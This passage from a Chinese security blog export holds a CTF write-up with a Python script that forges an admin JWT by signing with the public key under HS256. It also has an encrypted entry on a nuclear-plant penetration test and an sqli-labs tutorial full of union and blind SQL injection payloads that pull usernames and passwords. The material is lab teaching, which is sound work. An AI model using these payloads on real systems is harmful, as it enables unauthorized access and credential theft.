<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254081515-43.png" alt="请添加图片描述"></p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254083805-46.png" alt="请添加图片描述">返回提交 token<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254086176-49.png" alt="请添加图片描述"></p>
<h2 id="修改签名算法"><a href="#修改签名算法" class="headerlink" title="修改签名算法"></a>修改签名算法</h2><p>把 cookie 清空后提交用户名密码</p>
<p>得到一串 jwt</p>
<p>丢进<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254091115-52.png" alt="请添加图片描述"><br>发现是 RS256 编码（不对称式编码)</p>
<p>需要改为对称式编码</p>
<p>如 HS256</p>
<p>题目中给了 public key</p>
<p>用 PUBLIC_KEY 采用 HS256 进行加密 payload 构造 token</p>
<p>借用<a href="https://blog.csdn.net/loseheart157">大神 h0ld1rs</a>的脚本</p>
<blockquote>
<p>无签名那段脚本</p>
<p>是勉勉强强写出来的</p>
<p>这题就先用大神的脚本吧</p>
<p>我太菜了</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">## coding=GBK</span></span><br><span class="line"><span class="keyword">import</span> hmac</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">&#x27;publickey.pem&#x27;</span>)<span class="comment">#需要将文中的publickey下载	与脚本同目录</span></span><br><span class="line">key = file.read()</span><br><span class="line"></span><br><span class="line"><span class="comment">## Paste your header and payload here</span></span><br><span class="line">header = <span class="string">&#x27;&#123;&quot;typ&quot;: &quot;JWT&quot;, &quot;alg&quot;: &quot;HS256&quot;&#125;&#x27;</span></span><br><span class="line">payload = <span class="string">&#x27;&#123;&quot;username&quot;: &quot;admin&quot;, &quot;role&quot;: &quot;admin&quot;&#125;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">## Creating encoded header</span></span><br><span class="line">encodeHBytes = base64.urlsafe_b64encode(header.encode(<span class="string">&quot;utf-8&quot;</span>))</span><br><span class="line">encodeHeader = <span class="built_in">str</span>(encodeHBytes, <span class="string">&quot;utf-8&quot;</span>).rstrip(<span class="string">&quot;=&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">## Creating encoded payload</span></span><br><span class="line">encodePBytes = base64.urlsafe_b64encode(payload.encode(<span class="string">&quot;utf-8&quot;</span>))</span><br><span class="line">encodePayload = <span class="built_in">str</span>(encodePBytes, <span class="string">&quot;utf-8&quot;</span>).rstrip(<span class="string">&quot;=&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">## Concatenating header and payload</span></span><br><span class="line">token = (encodeHeader + <span class="string">&quot;.&quot;</span> + encodePayload)</span><br><span class="line"></span><br><span class="line"><span class="comment">## Creating signature</span></span><br><span class="line">sig = base64.urlsafe_b64encode(hmac.new(<span class="built_in">bytes</span>(key, <span class="string">&quot;UTF-8&quot;</span>), token.encode(<span class="string">&quot;utf-8&quot;</span>), hashlib.sha256).digest()).decode(<span class="string">&quot;UTF-8&quot;</span>).rstrip(<span class="string">&quot;=&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(token + <span class="string">&quot;.&quot;</span> + sig)</span><br></pre></td></tr></table></figure>

<p>运行后把 token 返回去验证</p>
<p>成功</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254094160-55.png" alt="请添加图片描述"><br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254096594-58.png" alt="请添加图片描述"></p>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>jwt</tag>
        <tag>json web token</tag>
      </tags>
  </entry>
  <entry>
    <title>福清核电-关基测试</title>
    <url>/2023/07/test-s1rius/</url>
    <content><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">
  <script id="hbeData" type="hbeData" data-hmacdigest="fedb83719e3f8a16f36640798b4f6d57348c9f803e8b99a82410876a0553c366">709e820b2f5bb6db36bae87ed03a646f74929f181a7d8d64b5544247bd132cbd4552cddf67f6de24830ee19681e4939e5d3b2c962a2d3926eb43be5b09c51f50a52cf9bb093e608b5b227af082f1d472cd86e5cd97c4e1c8963b87c20ced607fa01d329cdf57c6d86b251879e8c5b9b9bda6017735ce66934345ff604e1e018e5adce97c71dac7a532a7a4d738ba02387bce9ad4d0bcc4969ad1cfb7da0546c699a838dc358a8d60a6a84d7ab4f2458dae589c4fccb0a306ad86a3c610cfb0155475b416e94dd037487578f3032e7abc52333a18194cfb28189e5232cf70614fa6162117e8849b2b2866c25d58111f8f97a763ddc5fb94aaca539d08535e53ae98a9bf83effa8ec7ba833f3cad1c718bb3c759ce8c3d8299c0837c6b120a1baae6bbfd6c787c959a1c1f60f6c26d1f0e0f1386bf534989676374ddd95b1d4f5347b1294c2b040dd85ce33de36b30fcdeec6c9dc19630220e871c2115cbdf1570ad69239df7f49c8c86b725bcf92aa0d8abebd141e1c4b00e3560763d47b82c638c12df4cd9f1cca085f797915fe5258e53150b7958d535932451d2609c1e2d0099be1856cce3136ee04602957245584763b8014af3067762ddaf586fb89afa3c18a47c9cf463718544d5a4e43d358713b2764ac277c634a2e755808594674d1a173ba94b582383fa0fb1dade9d34b609f0f3fd30e923f1cae31af34bba09ae9c01b048f8792ef2bfe4d518e7717c6eaab413b04a7f4eee81f4c2ff1cfdcff90c65eb65ead2f78f48ba43ac890e90ecdd66e1f003d9a1de31093afb75cbba13b3d8a1cc38af7d1abfc922bf6562dabd9c4917b54d86e70813373a08a33e0bc44745312fdf74587dcc2413b647e9a4d01f6b4a2234b77568f220f344960fdacdd6b6225a47a7f2b2d6b5a19642973bcc7e5ceadc574220772580e264fbf5d4bfd66117cc664ee1a8da3d8f713fed9c72372557e877c296427306ec633e50e3a65d4f5dc5d9858fe60fda2807f2aff82ae8f121bd67e72fb09d9602f16c53bebb77ccc1071fb2f8843e5f8816f7c27cd401953cff68e706c56a93d6e44585f99496a6eb71f3bae3d67e5de8f7fd0a1c5c9759dd707e200029e9046fa00a4bcb742c3d68c3863a30f1b5edbce61f9aea598cfbaac8ce60ad7bdfde2819e5659f790ef2301d6b4fbbaec044bc0d4df9f4273d98532d87e17b9277eac20ca21b9e1997e77a684bb19ea5aadca7115fe79a8f79062a8efc7dda03703657d8e8eec5d476b361fb3ffb0de05d0d5cf8506719aca5f938e718fa652ca28b158aecea1174641867e824fd5a7079c243bbabc0fe0ded8e48b376ebad7884d42c8e8fd68a4726bbe6097cdd63209c0e4b21b98b77f10a68df24741d043ce7946421075ab50ef0870570547e39d1c99413caaec9aae2c9c7932a1ec5adfd3c2f65f74947a93fbedb2d02138fc0c99b0b6d99836427b8b2e268cc2d43a93d282b60daaced8370155f2d3a8c67707e3955b497d9386cb1693212a6867623012e8719cd4add766460aed6966d8b2d103a5676779ef86605ee54f3e2494611bc04e30b8bffd678b5c9cd16784c06c58a278ee1138f6c7186c0df890f2170985439370b973af29e44dd1b666c35708ebd2f35def1b48f6ca6c8b68d2543efaffa604bc2a7598f28b5b53b17bc38d3d9996711bca2259b16dd45e56aeb98ad5e24f48c57f216776fb90284b6ae6bc10b04aed39548110e680f144e2f1187355ae085505c004ce34d6fe1c1c66490a9fe15be6b08ac74cdc2de251a0b920292fc48df688454d34e4f32d05e039e99c85be846aa89f958e92da6f6a0c05fb9af0e977af2f6e478d2a83fbd0ef1c3b9f3a93719313ea17589a33c84c156be34519927b13094bf8df9285ee21217a982e50f727f5f7816590d19cd8c05d15c42447358fa0384e511ced968f0700248441705ac4db38c794b69ece38b7c2e6b96bae739c3661ed5053dbd90ec076ca3485eb1944840606b8d07e0b65f17cf47d98ff636d3b37eb378aed8d9f89456802e54f4282890cdc7f8b911ef0eca7b143fd40cc4c552273fb0bb926a2ec22eb51e705a81c67027783e3cdf8f676ad81af46457c4595a932c925841581d5a4467a98c096a59ac83bc39b312d3e82f672181f9f4c883ea6b9e60c5fa73a38aee31f9d88920a47809e6e981ca362daef39cab612601c95f9ee6f782b44996e46735d4df8591fefd0461121c3decbe8dd4906d4a823b1aea9cc60f98b47d78d15410b8442cff603120c1c72c89c5cdba85e56149631460814d07c66e03e5091fb86ccd8b9aefb4cc9db9b488f341fba676e6eac399bd2f7cd496df584cb9a33a731c8750a5cc60bd3fbae93217d3f147950e54a10361a8620688f7389475692ca5328b5bd75181310aba4fd2ae603d5d86e9b911f736937127de14a8a4e2e435a287e1171012d7b39da1b86a951326a80df48ce64943d5e1a0326d2135f36650dc3018df8b1400ba4c74a85432bdcdc3ea048ae700fc3850cb69958d0374cf969d506e4cfcdb82dbd7e010908ae4e3dc0e22b6df6df8003b734c37a38b79e349d3f62a665de36f6ee4ac0beeb636608e6a4a535f5f24d98e9c6f7f3acc103f1704e4a6000649625a3d163cbd2b2a0c237fa1eb2c11f47a4803c5ec79973280c9cc0730882c823bc3c392e11e20b3b512b8040cfb4a532511b4de502c3ad1edd6bddad9f207fee0649b80d873be51f295f7ab0c7702e8b9e6197a9c79eb48d1c5789b3360846a62cb51eca81f1d82b5c09eece504af5fcc205f61b9b6cf568df00be2b65c58c775a742a0d1de5c0955c56b1aa5c4bb6bf826ead497d2993c22d55c5b1490694ef611be02cf48b3d68b0299787a93dccd3fe62628eb5a2bfee271043f2996688fddd4833c39226ffcce40ccd0409d0e1880e3da4086dd8ac30c95f8d15361090fc0388d5aa2be8544390eec85549a2152699d84975fbbdf6be8112129dee70b566867199eae93ee553459b1684a0a858621447e0a1dea011fe77c2524a14bb3451a9edb9bd5d3dc19b62e8e426e16ae27a7908163f77c2d1b3ae635b033667e9c0344dae97b4e1f109d17673476a303e1accd69552262c5d6ec9db8509e4e4cb2b7f90c18aa59b59f092d868b20731b5b3f24a88dba45818cc649d72f3292f475de97ce5f0fb0d4169550fd1e6ae662d74a95ea3f861606b7227d5c8be068cfad3066c5384ef6813ae96bce3b7475e3d6ec02d99ecf5d41954b6676887648448e80bda65ba0726074c8bd9990004f0a465a162a31ebbf3f80cdc3eb5fd7a8ebdca552ff94071f5cf519059b527ff9ffac92149e2b6ec456fc342cbd9437053512a92925fce6530b5e36b94fc92c8c7f13708be7fa7132bf8c4a1ef5304206696b54e7f14e457422556b8e68104fae8581d95509b46cdab773e331da651250145044e46798f709ab3a160ca8aac3253172cb548b6611aed95c03d486ad820138a3ea456335349b5d699f992080ef7a964ad4ce95f6a3a6f4f1d558cd813b10d572a34e1189db2f266d7ad37ef59621f95aa35b84088939cc58633810f6ca55d08fd23cb6627dee845fb982ff7bffe734058a1c1547275a4e97c017b424d9fbc03d63abb4fa9aa360a429ee766e0ccf9d4379923028d1bc7e74e557c1655c56aff94e26a7b3d25f4c11d25d8f6efc9f5873ea2eb7ec28d6aa01f6a53340bbecc0b3eb6f3078cdd87b6317174b79bc1241cd0c6d8ccbdf8b7fb35df7e2c8ac38f928f4d9d14edfa0b397c091b1ed49ae71e6ecc0da2835a94214a93866ad1d329e1f7163af177c58ad8073ed4d90f670eb3ccccbf5cd3f1cf34055f55f0915d8dc134abf87f34cddf38aac322fcab35efc88faca44ee57cd73b8af1ea67e3a1a6335c493479236ad1d5cf57ac4c8de47ccd8bd73cc9997aff1274164526dc04070d55d6e28c3e243b229bbba51bf8db8ad2f3551d492406ce8b0c42db403bc243cc704864c0d0a658dca68fe8298ae532d99b6bfd72faca94267a8c7e16e105e6ad0a574cee99127eb59b2c8bdce63ed8048fc85046a373f8122195ffedd2f82360c3b03699eda989425d2c96acc8b7b2b8cccc0bb9a275a883936c424eab0c70b83ca1a094e28ffc4b6a9e2b50cf9e9161a4e64db6edd6473fe1aadc02e5f4316cc43a433da5c24882f2e63bba077de360db807ad974c09beb6c1ee65338346aae164e4203c69c826cd6e3657a443c1949c8c30a9ba5e1c889758880289cf42230b7fc2dea33cb7f4d1545fa230d6861ca8dbcee00e0e25adb686b62221f829c722e761aa119ad0b6837b4d653aeb93f8200575aa08da151de35ff8f1413c50aadea5ab2800f455cbc719e72ed3527f8a683db9e4ed54ac96bb9295c6a1cd8f143508c40599abba122cb0cc9cf931a4a3bad8e2c43db000c6ae5f5915dc126a805e3fb08258e275ad7ed7186f37af11f709e05dc40f1b0b4e9c0e7b5e99262f7eabce8f07e767e363a45ca93f8fdaada4751b572735d74e5b972efb54473b12bb2fc4221302d766ceaaa15cd7874ae93021bb20396a0f3ffcdd8ec8c48092687d0f7d3dbef93904621e9697e03668725d1c6b14b892d7c9defd43238a0279a63a07f032e2750062fc81a6fdaa139bbbe4e8cdccf9fae22755e10625844acb44dc7871df55415c354e05e769b73b1308356f6067bdd07a434c0986077555883a8d80e37f60a30fc6990276f2f25e385fd122aa5d6a8bbcfa2231a17419c4dc06101a885120718e771bf128234a2b02746f592ea8ec614a85b5a483c164ea03da3dfd21f2edf7c128150be6576f95b48c8bed950fd18f81fd5281965e80fbef18da4ce2ceac97863d14c0ae4c2f9503ccdad1752c4b2c02024c079cfebb0aa0bced1fc7b73a0e6ed2b9bf6aafe3fe2b4c073eefe876a9f28ee27d4eec72135370d3b7cb1ce9be3e1410c75833ecd76f732da2d0fae59604ff3e99650de3125f727d814038183690aa656d2907544f02c618b2230f0fb6c7b32f2cb571b9c6649e824966121f07732ecbaa9ba12f9a59a5c0f4fe229a4938d3d8f90addca9a1e180a844ec905fd05c623c60ab1a953d10cd84d39cb31f0b61119d25275f219c7e9b4045f0ba2e2d0cd9765a7c92544b56ca3b8c79b69f19fdeb6ee12607d1b87c380a71313011ba3ba71312d7cdfc1b5359fabbb876ae81610597aa91238bc4e7ef0c72d4beb1ed7d6b0ab47</script>
  <div class="hbe hbe-content">
    <div class="hbe hbe-input hbe-input-default">
      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">
      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">
        <span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>
      </label>
    </div>
  </div>
</div>
<script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
      <categories>
        <category>内网</category>
      </categories>
      <tags>
        <tag>内网</tag>
        <tag>渗透</tag>
      </tags>
  </entry>
  <entry>
    <title>sqli-lab</title>
    <url>/2023/07/sqli-lab/</url>
    <content><![CDATA[<p>sql 注入就是<br>当用户输入一些本不是用户名密码的 sql 语句<br>这些语句没有被过滤<br>执行后通过回显等方式，使注入者获得了数据库的信息</p>
<blockquote>
<p>水了几天用来搞 visual studio2022 和 Windows11 所以本文略微简陋写，以后会完善<br>visual studio2022 版美化教程见<a href="https://blog.csdn.net/qq_62414126/article/details/121863518">Visual Studio 2022 界面美化教程</a>.</p>
</blockquote>
<h2 id="GET-传参"><a href="#GET-传参" class="headerlink" title="GET 传参"></a>GET 传参</h2><p>先放代码</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//including the Mysql connect parameters.</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;../sql-connections/sql-connect.php&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="comment">// take the variables</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line"><span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line"><span class="comment">//logging the connection parameters to a file for analysis.</span></span><br><span class="line"><span class="variable">$fp</span>=<span class="title function_ invoke__">fopen</span>(<span class="string">&#x27;result.txt&#x27;</span>,<span class="string">&#x27;a&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">fwrite</span>(<span class="variable">$fp</span>,<span class="string">&#x27;ID:&#x27;</span>.<span class="variable">$id</span>.<span class="string">&quot;\n&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>);</span><br><span class="line"><span class="comment">// connectivity</span></span><br><span class="line"><span class="comment">//注意get传参</span></span><br><span class="line">获取到输入的id后先打开一个result.txt然后把你上传的写入到那个文件里</span><br><span class="line">这样你再一次操作后你就可以看到你的注入语句真正注进去的是啥了</span><br><span class="line"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=&#x27;<span class="subst">$id</span>&#x27; LIMIT 0,1&quot;</span>;</span><br><span class="line"><span class="comment">//上面一行中$id前后的符号是关键，是注入语句闭合的符号</span></span><br><span class="line"><span class="variable">$result</span>=<span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_array</span>(<span class="variable">$result</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$row</span>)</span><br><span class="line">	&#123;</span><br><span class="line">	  	<span class="keyword">echo</span> <span class="string">&quot;&lt;font size=&#x27;5&#x27; color= &#x27;#99FF00&#x27;&gt;&quot;</span>;<span class="comment">//正确回显颜色为绿色</span></span><br><span class="line">	  	<span class="keyword">echo</span> <span class="string">&#x27;Your Login name:&#x27;</span>. <span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">	  	<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">	  	<span class="keyword">echo</span> <span class="string">&#x27;Your Password:&#x27;</span> .<span class="variable">$row</span>[<span class="string">&#x27;password&#x27;</span>];</span><br><span class="line">	  	<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;</span><br><span class="line">  	&#125;</span><br><span class="line">  	<span class="comment">//这是输入正确时的反馈，直接把运行结果告诉你</span></span><br><span class="line">    但是后几关就不一样了</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot;&gt;&#x27;</span>;<span class="comment">//报错回显为黄色</span></span><br><span class="line">		<span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">mysql_error</span>());</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">//这是输入错误时的反馈，把mysql_error反馈给你</span></span><br><span class="line">    同样，后几关也不一样了</span><br><span class="line">&#125;</span><br><span class="line">	<span class="keyword">else</span> &#123; <span class="keyword">echo</span> <span class="string">&quot;Please input the ID as parameter with numeric value&quot;</span>;&#125;</span><br><span class="line"><span class="comment">//这是反馈你输入为空的</span></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><code>/* *我为了让读者能看得更清晰，我将注释符的右半部分删去，就像这句一样没有* */（你细品这句话 悖论）</code><br>我第一个注释是：注意 get 传参，前 10 关前半部分代码不变<br>第二个注释是提示读者要注意每一关的闭合方式（包裹方式）<br>在 if 后 else 前是正确回显部分 在 else 后是错误回显部分<br>这两部分是区分注入方式所需要关注的</p>
<h3 id="先讲理论"><a href="#先讲理论" class="headerlink" title="先讲理论"></a><code>先讲理论</code></h3><p>根据两部分分别是否回显判断注入方式<br>注入方式包含联合查询、布尔盲注、时间盲注、报错注入等</p>
<h4 id="传参"><a href="#传参" class="headerlink" title="传参"></a>传参</h4><p>最基础的就是?id&#x3D;1’、username&#x3D;admin’这类传参语句，后面的’引号是闭合方式上面有讲，他用的啥符号闭合，你就要用相同的符号来闭合你的语句，输入这类最基础的注入语句来判断是否有报错回显 回显是黄色，代码段注释里有写</p>
<h4 id="判断正确回显（绿色）的数据库中数据的列数，即本靶场回显的行数"><a href="#判断正确回显（绿色）的数据库中数据的列数，即本靶场回显的行数" class="headerlink" title="判断正确回显（绿色）的数据库中数据的列数，即本靶场回显的行数"></a>判断正确回显（绿色）的数据库中数据的列数，即本靶场回显的行数</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span>’ <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">1</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>这里的省略号只要不报错 就加大数字，直到报错的前一个数字，就是回显的行数</p>
<h4 id="判断回显的数据是数据库中的哪几列"><a href="#判断回显的数据是数据库中的哪几列" class="headerlink" title="判断回显的数据是数据库中的哪几列"></a>判断回显的数据是数据库中的哪几列</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>这里的数字的最大值要等与上一步得到的那个数<br>上一步 7 报错，那行数就是 6，这一步就要 1，2，3，4，5，6–+<br>看看那几个数字出现在你屏幕上了<br>要注意要 id&#x3D;一个不正确的值 如 0，-1 之类 这样联合查询之后的返回值会让 union 之后的查询语句的结果在数组的第一列，而后台 php 代码只会回显第一列的数据</p>
<h4 id="查库名"><a href="#查库名" class="headerlink" title="查库名"></a>查库名</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata <span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>这里把查数据库的 sql 语句，替换掉出现在你屏幕上的一个数字 这里是 3 来回显在屏幕上<br>group_concat(你要查询的数据）from 所在的库 表 列<br>这里查库名即查<code>schema_name</code> 这个数据被保存在<code>information_schema.schemata</code><br>这样 回显的就是 数据库们 的名字</p>
<h4 id="查表名"><a href="#查表名" class="headerlink" title="查表名"></a>查表名</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>‘security’–<span class="operator">+</span></span><br></pre></td></tr></table></figure>

<p>table 表 information_schema.tables 类比上面 table_schema&#x3D;‘ 库名’<br><code>这里你要猜一下</code>哪个数据库会放着你想要的数据，然后输在库名那个位置</p>
<h4 id="查列名"><a href="#查列名" class="headerlink" title="查列名"></a>查列名</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name<span class="operator">=</span>‘users’<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>同样类比上面 column 列<br><code>这里还要猜</code> 上面回显的哪个表里有你要的数据</p>
<h4 id="提取数据"><a href="#提取数据" class="headerlink" title="提取数据"></a>提取数据</h4><p><code>激动人心的时候到了</code></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(concat_ws(’<span class="operator">~</span>’,username,password)) <span class="keyword">from</span> users–<span class="operator">+</span></span><br></pre></td></tr></table></figure>

<p>同样类比上面 有一处特殊 concat_ws(符号，列名，列名）<br>中间那个符号会被 concat_ws 插入到两组数据之间，就是为了方便看<br>这样就查到数据了，是不是很简单。</p>
<h4 id="limit"><a href="#limit" class="headerlink" title="limit"></a>limit</h4><p>limit 是限制那一部分显示，limitx，y 是从 x+1 开始显示 y 个</p>
<h3 id="实操"><a href="#实操" class="headerlink" title="实操"></a>实操</h3><h4 id="正错回显都有"><a href="#正错回显都有" class="headerlink" title="正错回显都有"></a>正错回显都有</h4><p>就按上面的步骤一步一步找到数据<br>security———&gt;users——&gt;username&amp;password 这就是靶场数据库的层次<br>图啥的以后再补</p>
<h3 id="理论进阶"><a href="#理论进阶" class="headerlink" title="理论进阶"></a><code>理论进阶</code></h3><h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="number">1</span>’ <span class="keyword">and</span> <span class="title function_ invoke__">sleep</span> (<span class="number">5</span>)–+</span><br><span class="line">?id=<span class="number">1</span>‘ <span class="keyword">and</span> <span class="keyword">if</span>((<span class="title function_ invoke__">left</span>((select schema_name <span class="keyword">from</span> information_schema.schemata limit <span class="number">4</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)=‘s’),<span class="number">1</span>,<span class="title function_ invoke__">sleep</span>(<span class="number">3</span>))–+</span><br></pre></td></tr></table></figure>

<p>这样的句子 sleep()就是延时执行的意思，</p>
<blockquote>
<p><code>让浏览器先睡一会</code><br>当你想判断对不对的时候，你就让对的睡一会，错的继续肝，这样你就能看出来了</p>
</blockquote>
<h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><p>下面几个方法各有优缺点<br>因为能知道 sql-lab 靶场数据库的数据<br>所以刷题时我多用 left<br>实际</p>
<h6 id="substr"><a href="#substr" class="headerlink" title="substr"></a>substr</h6><p>substr(a,b,c)将 a 字段从第 b 个字符读取 c 个字符</p>
<h6 id="ascii"><a href="#ascii" class="headerlink" title="ascii"></a>ascii</h6><p>将括号中的字符转换为 acsii 码，再在最后进行值大小的判断，正确返回 1，错误返回 0</p>
<blockquote>
<p>类似于数学中的二分法</p>
<h6 id="left"><a href="#left" class="headerlink" title="left"></a>left</h6><p>left(a)从第一位开始读取 a 个字符</p>
</blockquote>
<h6 id="模糊查询-like"><a href="#模糊查询-like" class="headerlink" title="模糊查询 like"></a>模糊查询 like</h6><p>a like ‘%b%’ 判断 a 字符串里是否有 b<br>a like ‘b%’ 判断 a 开头是否有 <del>b 数</del></p>
<h6 id="regexp"><a href="#regexp" class="headerlink" title="regexp"></a>regexp</h6><p>regexp ‘a’正则表达式</p>
<blockquote>
<p>RegExp 对象表示正则表达式，它是对字符串执行模式匹配的强大工具 正则表达式通常被用来检索、替换那些符合某个模式(规则)的文本。<br>许多语言都有正则表达式<br>物理也有正则<br>所以正则是个啥(≧﹏ ≦)</p>
</blockquote>
<h3 id="实操进阶"><a href="#实操进阶" class="headerlink" title="实操进阶"></a>实操进阶</h3><h4 id="有报错回显-无正确回显"><a href="#有报错回显-无正确回显" class="headerlink" title="有报错回显 无正确回显"></a>有报错回显 无正确回显</h4><p>也就是说你在前四关能看见的绿字在 5-8 关用 you are in 替换了<br>也就是你之前查的库名 表名 列名 和数据不会回显了<br>当使用布尔盲注时 如果判断正确就会显示 you are in<br>不正确的话就会报错<br>下图是第五关第一个用户名 最后一步注入语句<br>之前步骤参考第 1 到 4 关查各类信息的语句并用布尔盲注所用函数包装<img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center.png" alt="在这里插入图片描述"></p>
<h4 id="正确回显和报错回显都没有"><a href="#正确回显和报错回显都没有" class="headerlink" title="正确回显和报错回显都没有"></a>正确回显和报错回显都没有</h4><p>不论你输入啥，他都会说 you are in</p>
<blockquote>
<p>就像你说 <code>啊对对对</code></p>
</blockquote>
<p>这样 布尔盲注也没法用了<br>你不知道注入语句是对是错<br>这时就要用时间盲注了<br>把布尔盲注再进行包装<br>if(布尔盲注语句,sleep(3),1)<br>正确的话，浏览器会延时 3 秒再运行<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254135027-77.png" alt="在这里插入图片描述"></p>
<h2 id="POST-传参"><a href="#POST-传参" class="headerlink" title="POST 传参"></a>POST 传参</h2><h3 id="先讲理论-1"><a href="#先讲理论-1" class="headerlink" title="先讲理论"></a><code>先讲理论</code></h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;!--Form to post the data for sql injections Error based SQL Injection--&gt;</span><br><span class="line">&lt;form action=&quot;&quot; name=&quot;form1&quot; method=&quot;post&quot;&gt;</span><br><span class="line">	&lt;div style=&quot;margin-top:15px; height:30px;&quot;&gt;Username : &amp;nbsp;&amp;nbsp;&amp;nbsp;</span><br><span class="line">	    &lt;input type=&quot;text&quot;  name=&quot;uname&quot; value=&quot;&quot;/&gt;</span><br><span class="line">	&lt;/div&gt;</span><br><span class="line">	&lt;div&gt; Password  : &amp;nbsp;&amp;nbsp;&amp;nbsp;</span><br><span class="line">		&lt;input type=&quot;text&quot; 